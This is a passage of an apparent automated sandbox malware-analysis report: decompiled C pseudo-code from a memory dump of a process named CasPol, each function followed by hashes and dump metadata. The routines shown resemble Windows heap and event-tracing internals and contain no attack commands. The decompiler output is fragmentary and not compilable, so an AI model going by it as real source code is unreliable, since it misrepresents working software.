                                                                  													if(__eflags == 0) {
                                                                  														E013F9240(_t80, _t99, _t99, _t102, __eflags);
                                                                  													}
                                                                  												}
                                                                  											} else {
                                                                  												_t94 = 0x14e86c4;
                                                                  												_t87 = 0x14e86c0;
                                                                  												L27:
                                                                  												E01429B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                                                                  											}
                                                                  										}
                                                                  									} else {
                                                                  										goto L13;
                                                                  									}
                                                                  								}
                                                                  							}
                                                                  						}
                                                                  						return E0144D130(_t80, _t99, _t102);
                                                                  					} else {
                                                                  						 *_t51 = 0x14e5388;
                                                                  						 *((intOrPtr*)(_t51 + 4)) = _t84;
                                                                  						 *_t84 = _t51;
                                                                  						 *0x14e538c = _t51;
                                                                  						goto L6;
                                                                  					}
                                                                  				}
                                                                  			}




















                                                                  0x014537c2
                                                                  0x014537b2
                                                                  0x013f9187
                                                                  0x013f9187
                                                                  0x013f918a
                                                                  0x013f918d
                                                                  0x013f918f
                                                                  0x013f9192
                                                                  0x013f9195
                                                                  0x00000000
                                                                  0x013f9195
                                                                  0x00000000
                                                                  0x0145376a
                                                                  0x0145376a
                                                                  0x0145376a
                                                                  0x0145376c
                                                                  0x0145376c
                                                                  0x0145376f
                                                                  0x01453775
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01453777
                                                                  0x01453779
                                                                  0x01453782
                                                                  0x01453787
                                                                  0x01453789
                                                                  0x01453790
                                                                  0x01453790
                                                                  0x0145378b
                                                                  0x0145378b
                                                                  0x0145378b
                                                                  0x01453792
                                                                  0x01453795
                                                                  0x00000000
                                                                  0x01453795
                                                                  0x00000000
                                                                  0x01453779
                                                                  0x01453798
                                                                  0x00000000
                                                                  0x01453798
                                                                  0x00000000
                                                                  0x01453768
                                                                  0x0145379b
                                                                  0x0145379b
                                                                  0x01453751
                                                                  0x01453749
                                                                  0x00000000
                                                                  0x01453740
                                                                  0x013f91a0
                                                                  0x013f91a3
                                                                  0x013f91a9
                                                                  0x013f91b0
                                                                  0x00000000
                                                                  0x013f91b0
                                                                  0x013f9187
                                                                  0x013f91b4
                                                                  0x013f91b4
                                                                  0x013f91bb
                                                                  0x013f91c0
                                                                  0x013f91c5
                                                                  0x013f91c7
                                                                  0x014537da
                                                                  0x013f91cd
                                                                  0x013f91cd
                                                                  0x013f91cd
                                                                  0x013f91d2
                                                                  0x013f91d5
                                                                  0x013f9239
                                                                  0x013f9239
                                                                  0x013f91d7
                                                                  0x013f91db
                                                                  0x013f91e1
                                                                  0x013f91e7
                                                                  0x013f91fd
                                                                  0x013f9203
                                                                  0x013f921e
                                                                  0x013f9223
                                                                  0x00000000
                                                                  0x013f9205
                                                                  0x013f9205
                                                                  0x013f9208
                                                                  0x013f920c
                                                                  0x013f9214
                                                                  0x013f9214
                                                                  0x013f920c
                                                                  0x013f91e9
                                                                  0x013f91e9
                                                                  0x013f91ee
                                                                  0x013f91f3
                                                                  0x013f91f3
                                                                  0x013f91f3
                                                                  0x013f91e7
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x013f9134
                                                                  0x013f9125
                                                                  0x013f911d
                                                                  0x013f914e
                                                                  0x013f90d1
                                                                  0x013f90d1
                                                                  0x013f90d3
                                                                  0x013f90d6
                                                                  0x013f90d8
                                                                  0x00000000
                                                                  0x013f90d8
                                                                  0x013f90cf

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 332eb88f82ac98d39f97371df68784deaca3d3c6fe830ea9f3a8bb400f23915e
                                                                  • Instruction ID: 0992b4d9b5c294baa1c1edab35b75c4d35946c66a3031e531126d66d9986f1da
                                                                  • Opcode Fuzzy Hash: 332eb88f82ac98d39f97371df68784deaca3d3c6fe830ea9f3a8bb400f23915e
                                                                  • Instruction Fuzzy Hash: F801AF726016068FD3269F19D840B16BBE9EB8532DF25407BE6058F7A6C774DC41CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 86%
                                                                  			E014C4015(signed int __eax, signed int __ecx) {
                                                                  				void* __ebx;
                                                                  				void* __edi;
                                                                  				signed char _t10;
                                                                  				signed int _t28;
                                                                  
                                                                  				_push(__ecx);
                                                                  				_t28 = __ecx;
                                                                  				asm("lock xadd [edi+0x24], eax");
                                                                  				_t10 = (__eax | 0xffffffff) - 1;
                                                                  				if(_t10 == 0) {
                                                                  					_t1 = _t28 + 0x1c; // 0x1e
                                                                  					E01412280(_t10, _t1);
                                                                  					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                  					E01412280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x14e86ac);
                                                                  					E013FF900(0x14e86d4, _t28);
                                                                  					L0140FFB0(0x14e86ac, _t28, 0x14e86ac);
                                                                  					 *((intOrPtr*)(_t28 + 0x20)) = 0;
                                                                  					L0140FFB0(0, _t28, _t1);
                                                                  					_t18 =  *((intOrPtr*)(_t28 + 0x94));
                                                                  					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
                                                                  						L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                                                                  					}
                                                                  					_t10 = L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                                                  				}
                                                                  				return _t10;
                                                                  			}








                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 31f78e30b8420fa6cb1be0074a0e96e85624b61482d1287722ad995c8b90caa1
                                                                  • Instruction ID: c62d84d459f779b606421f94a01f013350c1d6f7d1f742a7b0d0c6686b0f1e5d
                                                                  • Opcode Fuzzy Hash: 31f78e30b8420fa6cb1be0074a0e96e85624b61482d1287722ad995c8b90caa1
                                                                  • Instruction Fuzzy Hash: 700184722415467FD651AB7ACE84E57B7ACFB65660B00022FB518C3A71CB34EC11CAE4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 79%
                                                                  			E014B138A(void* __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                  				signed int _v8;
                                                                  				intOrPtr _v16;
                                                                  				intOrPtr _v20;
                                                                  				intOrPtr _v24;
                                                                  				intOrPtr _v28;
                                                                  				short _v54;
                                                                  				char _v60;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				signed char* _t21;
                                                                  				void* _t27;
                                                                  				intOrPtr _t33;
                                                                  				intOrPtr _t34;
                                                                  				signed int _t35;
                                                                  
                                                                  				_t32 = __edx;
                                                                  				_t27 = __ebx;
                                                                  				_v8 =  *0x14ed360 ^ _t35;
                                                                  				_t33 = __edx;
                                                                  				_t34 = __ecx;
                                                                  				E0143FA60( &_v60, 0, 0x30);
                                                                  				_v20 = _a4;
                                                                  				_v16 = _a8;
                                                                  				_v28 = _t34;
                                                                  				_v24 = _t33;
                                                                  				_v54 = 0x1033;
                                                                  				if(E01417D50() == 0) {
                                                                  					_t21 = 0x7ffe0388;
                                                                  				} else {
                                                                  					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                  				}
                                                                  				_push( &_v60);
                                                                  				_push(0x10);
                                                                  				_push(0x20402);
                                                                  				return L0143B640(E01439AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34,  *_t21 & 0x000000ff);
                                                                  			}


















                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 089d449b1abee8507104b68f3b380e95b9dbab901a0b99776e912d7d4b683d31
                                                                  • Instruction ID: 8f5e66fc0dc61827a0dcd295cf7788c609a0b55a8dd3b789340d5de2be59cb61
                                                                  • Opcode Fuzzy Hash: 089d449b1abee8507104b68f3b380e95b9dbab901a0b99776e912d7d4b683d31
                                                                  • Instruction Fuzzy Hash: 70019271E01209AFDB10EFA9D881FAEBBB8EF54700F00405BB904EB390E6749A01C791
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 91%
                                                                  			E013F58EC(void* __ecx) {
                                                                  				signed int _v8;
                                                                  				char _v28;
                                                                  				char _v44;
                                                                  				char _v76;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				intOrPtr _t10;
                                                                  				intOrPtr _t16;
                                                                  				void* _t17;
                                                                  				void* _t27;
                                                                  				intOrPtr _t28;
                                                                  				signed int _t29;
                                                                  
                                                                  				_v8 =  *0x14ed360 ^ _t29;
                                                                  				_t10 =  *[fs:0x30];
                                                                  				_t27 = __ecx;
                                                                  				if(_t10 == 0) {
                                                                  					L6:
                                                                  					_t28 = 0x13d5c80;
                                                                  				} else {
                                                                  					_t16 =  *((intOrPtr*)(_t10 + 0x10));
                                                                  					if(_t16 == 0) {
                                                                  						goto L6;
                                                                  					} else {
                                                                  						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
                                                                  					}
                                                                  				}
                                                                  				if(E013F5943() != 0 &&  *0x14e5320 > 5) {
                                                                  					E01477B5E( &_v44, _t27);
                                                                  					_t22 =  &_v28;
                                                                  					E01477B5E( &_v28, _t28);
                                                                  					_t11 = E01477B9C(0x14e5320, 0x13dbf15,  &_v28, _t22, 4,  &_v76);
                                                                  				}
                                                                  				return L0143B640(_t11, _t17, _v8 ^ _t29, 0x13dbf15, _t27, _t28);
                                                                  			}
















                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ba29bf430f2c9bfdfbc075896fe53e2d4bbdf96e8e67dc7015f630d2cd9b6577
                                                                  • Instruction ID: b372864e35a578664134e5e48bcad97d1c7375836e089b7a3a0188dc5ab8ced0
                                                                  • Opcode Fuzzy Hash: ba29bf430f2c9bfdfbc075896fe53e2d4bbdf96e8e67dc7015f630d2cd9b6577
                                                                  • Instruction Fuzzy Hash: 4901F236A00109DBCB18EA69D804ABF7BACEF91128F94006E9A05AB664DE30DD05C790
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 54%
                                                                  			E014C1074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                                                                  				char _v8;
                                                                  				intOrPtr _v11;
                                                                  				unsigned int _v12;
                                                                  				intOrPtr _v15;
                                                                  				void* __esi;
                                                                  				void* __ebp;
                                                                  				unsigned int _t13;
                                                                  				char* _t16;
                                                                  				signed int* _t35;
                                                                  
                                                                  				_t22 = __ebx;
                                                                  				_t35 = __ecx;
                                                                  				_v8 = __edx;
                                                                  				_t13 =  !( *__ecx) + 1;
                                                                  				_v12 = _t13;
                                                                  				if(_a4 != 0) {
                                                                  					_push((_t13 >> 0x14) + (_t13 >> 0x14));
                                                                  					L014C165E(__ebx, 0x14e8ae4, (__edx -  *0x14e8b04 >> 0x14) + (__edx -  *0x14e8b04 >> 0x14), __edi, __ecx, (__edx -  *0x14e8b04 >> 0x14) + (__edx -  *0x14e8b04 >> 0x14));
                                                                  				}
                                                                  				_push( *((intOrPtr*)(_t35 + 0x38)));
                                                                  				_push( *((intOrPtr*)(_t35 + 0x34)));
                                                                  				_push(0x8000);
                                                                  				L014BAFDE( &_v8,  &_v12);
                                                                  				if(E01417D50() == 0) {
                                                                  					_t16 = 0x7ffe0388;
                                                                  				} else {
                                                                  					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                  				}
                                                                  				if( *_t16 != 0) {
                                                                  					_t16 = L014AFE3F(_t22, _t35, _v11, _v15);
                                                                  				}
                                                                  				return _t16;
                                                                  			}













                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7de40ab67bb0db778022ae913d7b44f5dc32a7659e702ba93bc8234b45ce7643
                                                                  • Instruction ID: c090e20c3ace823833fe6b3923221d31d1937f6a8834093fa2c4b809f8edcb4d
                                                                  • Opcode Fuzzy Hash: 7de40ab67bb0db778022ae913d7b44f5dc32a7659e702ba93bc8234b45ce7643
                                                                  • Instruction Fuzzy Hash: 01012876604742DFC750DB2AC944B5B7BE5ABA4A10F04861EF985837B2DE30D841CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E0140B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                                                                  				signed char _t11;
                                                                  				signed char* _t12;
                                                                  				intOrPtr _t24;
                                                                  				signed short* _t25;
                                                                  
                                                                  				_t25 = __edx;
                                                                  				_t24 = __ecx;
                                                                  				_t11 = ( *[fs:0x30])[0x50];
                                                                  				if(_t11 != 0) {
                                                                  					if( *_t11 == 0) {
                                                                  						goto L1;
                                                                  					}
                                                                  					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                  					L2:
                                                                  					if( *_t12 != 0) {
                                                                  						_t12 =  *[fs:0x30];
                                                                  						if((_t12[0x240] & 0x00000004) == 0) {
                                                                  							goto L3;
                                                                  						}
                                                                  						if(E01417D50() == 0) {
                                                                  							_t12 = 0x7ffe0385;
                                                                  						} else {
                                                                  							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                  						}
                                                                  						if(( *_t12 & 0x00000020) == 0) {
                                                                  							goto L3;
                                                                  						}
                                                                  						return E01477016(_a4, _t24, 0, 0, _t25, 0);
                                                                  					}
                                                                  					L3:
                                                                  					return _t12;
                                                                  				}
                                                                  				L1:
                                                                  				_t12 = 0x7ffe0384;
                                                                  				goto L2;
                                                                  			}








                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                  • Instruction ID: c472c793dd84bd80caba05f16fcc72c387ab534d298ad145bc9ba9503a889e81
                                                                  • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                  • Instruction Fuzzy Hash: 59015EB62005849FE323D71EC948F677BD8EB95654F0940A2AA19CB7B2D638DC41C625
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 77%
                                                                  			E014C8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                  				signed int _v12;
                                                                  				intOrPtr _v24;
                                                                  				intOrPtr _v28;
                                                                  				intOrPtr _v32;
                                                                  				intOrPtr _v36;
                                                                  				intOrPtr _v40;
                                                                  				short _v66;
                                                                  				char _v72;
                                                                  				void* __ebx;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				signed char* _t18;
                                                                  				signed int _t32;
                                                                  
                                                                  				_t29 = __edx;
                                                                  				_v12 =  *0x14ed360 ^ _t32;
                                                                  				_t31 = _a8;
                                                                  				_t30 = _a12;
                                                                  				_v66 = 0x1c20;
                                                                  				_v40 = __ecx;
                                                                  				_v36 = __edx;
                                                                  				_v32 = _a4;
                                                                  				_v28 = _a8;
                                                                  				_v24 = _a12;
                                                                  				if(E01417D50() == 0) {
                                                                  					_t18 = 0x7ffe0386;
                                                                  				} else {
                                                                  					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                  				}
                                                                  				_push( &_v72);
                                                                  				_push(0x14);
                                                                  				_push(0x20402);
                                                                  				return L0143B640(E01439AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31,  *_t18 & 0x000000ff);
                                                                  			}

















                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ac7e38129749cce71bbc48f2f1cb6f0a1750ca83e53311b2252f9f1f3771f6c3
                                                                  • Instruction ID: 335f5daf677d5679d70f9e9a39eef429394cd5070452db7b07a6495afe3c946c
                                                                  • Opcode Fuzzy Hash: ac7e38129749cce71bbc48f2f1cb6f0a1750ca83e53311b2252f9f1f3771f6c3
                                                                  • Instruction Fuzzy Hash: 67012C75A0021DAFCB00DFA9D9419AEBBB8EF98710F10405BF904E7361D634A901CBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E013FDB60(intOrPtr* __ecx) {
                                                                  				intOrPtr* _t9;
                                                                  				void* _t12;
                                                                  				void* _t13;
                                                                  				intOrPtr _t14;
                                                                  
                                                                  				_t9 = __ecx;
                                                                  				_t14 = 0;
                                                                  				if(__ecx == 0 ||  *__ecx != 0) {
                                                                  					_t13 = 0xc000000d;
                                                                  				} else {
                                                                  					_t14 = E013FDB40();
                                                                  					if(_t14 == 0) {
                                                                  						_t13 = 0xc0000017;
                                                                  					} else {
                                                                  						_t13 = L013FE7B0(__ecx, _t12, _t14, 0xfff);
                                                                  						if(_t13 < 0) {
                                                                  							L013FE8B0(__ecx, _t14, 0xfff);
                                                                  							L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
                                                                  							_t14 = 0;
                                                                  						} else {
                                                                  							_t13 = 0;
                                                                  							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
                                                                  						}
                                                                  					}
                                                                  				}
                                                                  				 *_t9 = _t14;
                                                                  				return _t13;
                                                                  			}








                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                  • Instruction ID: 74ad18026e6e7f24e3c1cd6ebe1d05fea59e591f2b89213a2f0e54862fd0a910
                                                                  • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                  • Instruction Fuzzy Hash: BEF09C3324152B9BD7326EDD4888F57BA999FD1A68F16003EF7059B754C9708C0297D1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E013FB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                                                                  				signed char* _t13;
                                                                  				intOrPtr _t22;
                                                                  				char _t23;
                                                                  
                                                                  				_t23 = __edx;
                                                                  				_t22 = __ecx;
                                                                  				if(E01417D50() != 0) {
                                                                  					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                  				} else {
                                                                  					_t13 = 0x7ffe0384;
                                                                  				}
                                                                  				if( *_t13 != 0) {
                                                                  					_t13 =  *[fs:0x30];
                                                                  					if((_t13[0x240] & 0x00000004) == 0) {
                                                                  						goto L3;
                                                                  					}
                                                                  					if(E01417D50() == 0) {
                                                                  						_t13 = 0x7ffe0385;
                                                                  					} else {
                                                                  						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                  					}
                                                                  					if(( *_t13 & 0x00000020) == 0) {
                                                                  						goto L3;
                                                                  					}
                                                                  					return E01477016(0x14a4, _t22, _t23, _a4, _a8, 0);
                                                                  				} else {
                                                                  					L3:
                                                                  					return _t13;
                                                                  				}
                                                                  			}







                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                  • Instruction ID: 29506f98438203c0aae5c5892b4fbed2eb251c471212faecb08dc4d654d9dccd
                                                                  • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                  • Instruction Fuzzy Hash: 0001F936200584ABD322975DC804F5ABB98EF51794F0C0066FE148B7B7E674CC40C314
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 73%
                                                                  			E014B131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                  				signed int _v8;
                                                                  				intOrPtr _v12;
                                                                  				intOrPtr _v16;
                                                                  				intOrPtr _v20;
                                                                  				intOrPtr _v24;
                                                                  				short _v50;
                                                                  				char _v56;
                                                                  				signed char* _t18;
                                                                  				void* _t24;
                                                                  				void* _t30;
                                                                  				void* _t31;
                                                                  				signed int _t32;
                                                                  
                                                                  				_t29 = __edx;
                                                                  				_v8 =  *0x14ed360 ^ _t32;
                                                                  				_v20 = _a4;
                                                                  				_v12 = _a8;
                                                                  				_v24 = __ecx;
                                                                  				_v16 = __edx;
                                                                  				_v50 = 0x1021;
                                                                  				if(E01417D50() == 0) {
                                                                  					_t18 = 0x7ffe0380;
                                                                  				} else {
                                                                  					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                  				}
                                                                  				_push( &_v56);
                                                                  				_push(0x10);
                                                                  				_push(0x20402);
                                                                  				return L0143B640(E01439AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31,  *_t18 & 0x000000ff);
                                                                  			}

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 90%
                                                                  			E01426B90(void* __ecx, intOrPtr* _a4) {
                                                                  				signed int _v8;
                                                                  				signed int _t11;
                                                                  				signed int _t12;
                                                                  				intOrPtr _t19;
                                                                  				void* _t20;
                                                                  				intOrPtr* _t21;
                                                                  
                                                                  				_t21 = _a4;
                                                                  				_t19 =  *_t21;
                                                                  				if(_t19 != 0) {
                                                                  					if(_t19 < 0x1fff) {
                                                                  						_t19 = _t19 + _t19;
                                                                  					}
                                                                  					L3:
                                                                  					 *_t21 = _t19;
                                                                  					asm("rdtsc");
                                                                  					_v8 = 0;
                                                                  					_t12 = _t11 & _t19 - 0x00000001;
                                                                  					_t20 = _t19 + _t12;
                                                                  					if(_t20 == 0) {
                                                                  						L5:
                                                                  						return _t12;
                                                                  					} else {
                                                                  						goto L4;
                                                                  					}
                                                                  					do {
                                                                  						L4:
                                                                  						asm("pause");
                                                                  						_t12 = _v8 + 1;
                                                                  						_v8 = _t12;
                                                                  					} while (_t12 < _t20);
                                                                  					goto L5;
                                                                  				}
                                                                  				_t12 =  *( *[fs:0x18] + 0x30);
                                                                  				if( *((intOrPtr*)(_t12 + 0x64)) == 1) {
                                                                  					goto L5;
                                                                  				}
                                                                  				_t19 = 0x40;
                                                                  				goto L3;
                                                                  			}

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 89%
                                                                  			E014B2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                                                                  				void* __esi;
                                                                  				signed char _t3;
                                                                  				signed char _t7;
                                                                  				void* _t19;
                                                                  
                                                                  				_t17 = __ecx;
                                                                  				_t3 = L014AFD22(__ecx);
                                                                  				_t19 =  *0x14e849c - _t3; // 0x0
                                                                  				if(_t19 == 0) {
                                                                  					__eflags = _t17 -  *0x14e8748; // 0x0
                                                                  					if(__eflags <= 0) {
                                                                  						L014B1C06();
                                                                  						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                                                                  						__eflags = _t3;
                                                                  						if(_t3 != 0) {
                                                                  							L5:
                                                                  							__eflags =  *0x14e8724 & 0x00000004;
                                                                  							if(( *0x14e8724 & 0x00000004) == 0) {
                                                                  								asm("int3");
                                                                  								return _t3;
                                                                  							}
                                                                  						} else {
                                                                  							_t3 =  *0x7ffe02d4 & 0x00000003;
                                                                  							__eflags = _t3 - 3;
                                                                  							if(_t3 == 3) {
                                                                  								goto L5;
                                                                  							}
                                                                  						}
                                                                  					}
                                                                  					return _t3;
                                                                  				} else {
                                                                  					_t7 =  *0x14e8724; // 0x0
                                                                  					_push( !_t7 >> 0x00000002 & 0x00000001);
                                                                  					return L014A8DF1(__ebx, 0xc0000374, 0x14e5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001);
                                                                  				}
                                                                  			}

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 54%
                                                                  			E0143927A(void* __ecx) {
                                                                  				signed int _t11;
                                                                  				void* _t14;
                                                                  
                                                                  				_t11 = L01414620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
                                                                  				if(_t11 != 0) {
                                                                  					E0143FA60(_t11, 0, 0x98);
                                                                  					asm("movsd");
                                                                  					asm("movsd");
                                                                  					asm("movsd");
                                                                  					asm("movsd");
                                                                  					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
                                                                  					 *((intOrPtr*)(_t11 + 0x24)) = 1;
                                                                  					E014392C6(_t11, _t14);
                                                                  				}
                                                                  				return _t11;
                                                                  			}

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 62%
                                                                  			E014C8B58(intOrPtr __ecx) {
                                                                  				signed int _v8;
                                                                  				intOrPtr _v20;
                                                                  				short _v46;
                                                                  				char _v52;
                                                                  				signed char* _t11;
                                                                  				void* _t17;
                                                                  				void* _t22;
                                                                  				void* _t23;
                                                                  				void* _t24;
                                                                  				signed int _t25;
                                                                  
                                                                  				_v8 =  *0x14ed360 ^ _t25;
                                                                  				_v20 = __ecx;
                                                                  				_v46 = 0x1c26;
                                                                  				if(E01417D50() == 0) {
                                                                  					_t11 = 0x7ffe0386;
                                                                  				} else {
                                                                  					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                  				}
                                                                  				_push( &_v52);
                                                                  				_push(4);
                                                                  				_push(0x402);
                                                                  				return L0143B640(E01439AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24,  *_t11 & 0x000000ff);
                                                                  			}

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 79%
                                                                  			E013FF358(void* __ecx, signed int __edx) {
                                                                  				char _v8;
                                                                  				signed int _t9;
                                                                  				void* _t20;
                                                                  
